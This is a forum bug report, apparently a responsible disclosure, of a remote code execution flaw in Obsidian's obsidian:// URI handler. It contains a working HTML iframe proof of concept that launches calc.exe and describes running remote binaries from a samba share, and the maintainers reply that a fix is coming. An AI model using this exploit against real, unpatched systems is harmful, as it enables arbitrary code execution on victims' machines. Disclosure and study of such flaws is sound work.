Possible remote code execution through obsidian:// URI scheme

sxy · July 2, 2022, 7:04am

Steps to reproduce

Create a html file with iframe tag, then serves it on HTTP server.

<!-- exploit.html -->
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Exploit</title>
</head>
<body>
    <iframe src="obsidian://hook-get-address?x-success=file:///c:/windows/system32/calc.exe%00"></iframe>
</body>
</html>

Open the html file in the browser. Modern web browser may popup a window to confirm to open Obsidian.exe, if we choose “Open Obsidian”, the command will be executed and popup a calc.exe.

Environment

Operating system:
Tested on Windows client latest version 0.14.15.

Additional information

When Obsidian receive hook-get-address action, it will use window.open to open any provided uri without validation, attacker can use remote samba server to execute any binary (e.g. x-success=\\samba server\shares\shellcode.exe, x-success=file://samba server/shares/rce.jar) or other protocol like sftp://.

CVSS v3.1 Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
CWE Types: CWE-20 Improper Input Validation

WhiteNoise · July 2, 2022, 12:43pm

Thanks, we’ll look into this shortly.

WhiteNoise · July 5, 2022, 11:13pm

will be handled better in 0.15.5.

sxy · July 6, 2022, 1:45am

Thanks for quick resolution, can we request a CVE ID for this issue?

system · July 13, 2022, 1:45am

This topic was automatically closed 7 days after the last reply. New replies are no longer allowed.